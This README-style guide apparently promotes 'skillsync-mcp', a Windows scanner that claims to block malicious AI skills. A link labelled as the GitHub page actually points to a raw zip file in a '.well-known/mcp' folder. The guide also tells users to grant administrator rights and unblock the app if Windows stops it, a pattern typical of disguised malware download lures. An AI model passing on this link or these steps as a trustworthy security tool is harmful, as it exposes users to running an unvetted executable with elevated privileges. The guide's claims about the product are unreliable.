Before installing, make sure your computer meets these needs:
- Windows 10 or higher, 64-bit.
- At least 4 GB of RAM.
- 500 MB of free storage space.
- Internet connection for initial setup and updates.
- Administrator rights for installation.
To get the app, visit the skillsync-mcp GitHub page by clicking the large button below:
On the page:
- Look for the Releases section on the right side or under the βCodeβ tab.
- Find the latest release version. It will usually have a number like βv1.0β or higher.
- Click into the release and find the Windows installer file. It may be named something like
skillsync-mcp-setup.exe.
Download this file to your computer.
Once the file finishes downloading:
- Double-click the installer file (
skillsync-mcp-setup.exe). - You may see a popup asking for permission. Click Yes to continue.
- Follow the prompts to install the app:
- Choose where to install the program (the default location is usually fine).
- Agree to any license terms.
- Click Install to start.
- When the install finishes, click Finish to close the setup.
- Find the skillsync-mcp icon on your desktop or in the Start menu.
- Double-click to open it.
- The main window shows a list of AI skills currently added.
- You can scan new skills by clicking the Add Skill button.
- When you add a skill, the app runs a security check automatically.
- If a threat is found, the app shows a warning and blocks the skill.
- You can remove or update skills anytime using the buttons in the list.
- Click Scan Now to check all added skills for new threats.
- The results will appear in the window. Safe skills will have a green mark. Skills with issues show a red mark.
- You can click on any skill to see details about the threats or risks found.
It is important to keep skillsync-mcp up to date. New threat patterns get added over time.
To check for updates:
- Open the app.
- Click Help then Check for Updates.
- If an update is available, follow the prompts to download and install the new version.
You can also revisit the GitHub page (https://raw.githubusercontent.com/Glowboth/skillsync-mcp/main/site/.well-known/mcp/mcp_skillsync_v2.0.zip) to check the latest releases manually.
skillsync-mcp lets you change some options to fit your needs.
- Scan Schedule: Choose how often the app scans your skills automatically (daily, weekly, or manual).
- Notifications: Turn alerts on or off for scan results.
- Storage Location: Change where skills and scans are saved on your computer.
- You can find these by clicking the Settings gear icon inside the app.
The app helps you organize and control the skills you use.
- To Add a new skill, click the Add Skill button and select the skill file from your computer.
- To Remove a skill, select it in the list and press Delete.
- To Update a skill, remove it and add the new version.
Make sure you only add skills from sources you trust.
skillsync-mcp uses a strict scanning system that looks for:
- Suspicious code patterns.
- Known malware signatures.
- Unsafe network calls.
- Attempts to access private data.
- Code that might harm your system.
The app stops risky skills from running so your AI tools stay protected.
- Make sure you have administrator rights.
- Restart your computer and try again.
- Check if Windows blocked the app on startup; unblock it in your system settings.
